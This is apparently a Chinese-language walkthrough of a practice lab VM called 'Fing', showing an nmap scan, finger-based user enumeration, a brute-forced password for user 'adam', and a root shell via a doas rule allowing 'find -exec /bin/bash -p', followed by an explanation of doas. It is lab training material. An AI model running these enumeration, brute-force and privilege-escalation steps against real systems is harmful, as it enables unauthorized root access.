# 靶场搭建
下载:Fing
Nat,IP: 192.168.1.140
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
79/tcp open finger Linux fingerd | |
|_finger: No one logged on.\x0D | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It works | |
|_http-server-header: Apache/2.4.56 (Debian) | |
MAC Address: 00:0C:29:69:AC:C9 (VMware) |
msf 里面有个 finger 服务的用户枚举
枚举出来一个用户 adam ,爆破吧
密码: passion
登录
# 提权
suid 权限的程序有个 doas ,这东西可以把他当成 sudo
adam@fing:~$ cat /etc/doas.conf | |
permit nopass keepenv adam as root cmd /usr/bin/find |
发现可以执行 find
adam@fing:~$ doas -u root /usr/bin/find . -exec /bin/bash -p \; -quit | |
root@fing:/home/adam# whoami | |
root |
拿到了 root 权限
# 小结
doas("do as" 的缩写)是一个类似于 sudo 的权限提升工具,用于在类 Unix 系统上以其他用户的身份执行命令。它允许普通用户在需要特权操作时,临时切换到其他用户(通常是超级用户,如 root)的身份来执行命令。
与 sudo 不同,doas 的设计目标是保持简单、轻量级和安全。它的代码相对较小,易于审核和维护。doas 遵循 "做少而做好" 的原则,仅提供必要的功能来提升权限,而不引入过多的复杂性。
doas 的配置文件通常位于 /etc/doas.conf 或者 /usr/local/etc/doas.conf。在该文件中,管理员可以定义哪些用户可以以哪个用户的身份执行特定的命令。这样可以限制用户的权限,避免滥用特权。
